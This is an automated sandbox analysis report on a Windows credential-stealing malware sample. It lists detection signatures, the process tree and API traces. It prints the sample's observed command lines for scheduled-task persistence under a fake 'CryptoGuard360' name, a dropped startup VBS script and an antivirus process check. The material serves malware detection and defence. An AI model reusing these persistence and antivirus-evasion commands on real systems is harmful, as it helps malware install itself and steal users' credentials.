Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00000123.exe

Overview

General Information

Sample name:00000123.exe
(renamed file extension from pif to exe)
Original sample name:00000123.pif
Analysis ID:1628000
MD5:20ab8d93805914ee4e7c7953b15928a5
SHA1:f752bf44c2e7d86f05b9e9c25e3cc96faa190a04
SHA256:e428c6fe9435b8c7aee48825abcd62916d8b4706c2877c94d01c4691387c7acf
Infos:

Detection

Discord Token Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected Discord Token Stealer
Yara detected Generic Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Drops PE files with a suspicious file extension
Drops VBS files to the startup folder
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 00000123.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\00000123.exe" MD5: 20AB8D93805914EE4E7C7953B15928A5)
    • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 7380 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
    • update.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\update.exe" MD5: 5A69E7FBEB1781A8AB7F77E74CABDB96)
      • cmd.exe (PID: 7724 cmdline: "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • expand.exe (PID: 7776 cmdline: expand Expensive.pps Expensive.pps.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
        • tasklist.exe (PID: 7800 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7812 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7860 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7868 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7904 cmdline: cmd /c md 611485 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7920 cmdline: extrac32 /Y /E Experts.pps MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 7944 cmdline: findstr /V "Gd" Investigations MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7956 cmdline: cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7976 cmdline: cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Heroes.com (PID: 7992 cmdline: Heroes.com H MD5: 62D09F076E6E0240548C2F837536A46A)
          • cmd.exe (PID: 8032 cmdline: cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 8080 cmdline: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • MSBuild.exe (PID: 7400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 7800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • choice.exe (PID: 8012 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • InstallUtil.exe (PID: 1396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 7288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 6084 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 3788 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • wscript.exe (PID: 8156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6472 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • GuardianCryptoScan360.com (PID: 5364 cmdline: "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2569244195.0000000008160000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            37.2.MSBuild.exe.5a10000.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.00000123.exe.8160000.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.00000123.exe.8160000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\00000123.exe", ParentImage: C:\Users\user\Desktop\00000123.exe, ParentProcessId: 7248, ParentProcessName: 00000123.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 7320, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\00000123.exe", ParentImage: C:\Users\user\Desktop\00000123.exe, ParentProcessId: 7248, ParentProcessName: 00000123.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 7320, ProcessName: cmd.exe
                  Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8032, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 8080, ProcessName: schtasks.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , ProcessId: 8156, ProcessName: wscript.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Heroes.com H, ParentImage: C:\Users\user\AppData\Local\Temp\611485\Heroes.com, ParentProcessId: 7992, ParentProcessName: Heroes.com, ProcessCommandLine: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 8108, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8032, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 8080, ProcessName: schtasks.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , ProcessId: 8156, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\00000123.exe, ProcessId: 7248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Sigma detected: Search for Antivirus process
                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7868, ProcessName: findstr.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: 00000123.exeReversingLabs: Detection: 23%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 00000123.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000123.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbW source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016A1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016A1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: n8C:\Windows\InstallUtil.pdb` source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb_NP* source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbiNF* source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl$ source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdba source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb"x source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb- source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb% source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062D5 FindFirstFileW,FindClose,6_2_004062D5
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00402E18 FindFirstFileW,6_2_00402E18
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00406C9B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A087
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A1E2
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,28_2_0078E472
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,28_2_0079A570
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075C622 FindFirstFileExW,28_2_0075C622
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007966DC FindFirstFileW,FindNextFileW,FindClose,28_2_007966DC
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00797333 FindFirstFileW,FindClose,28_2_00797333
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,28_2_007973D4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078D921
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078DC54
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\611485Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\611485\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
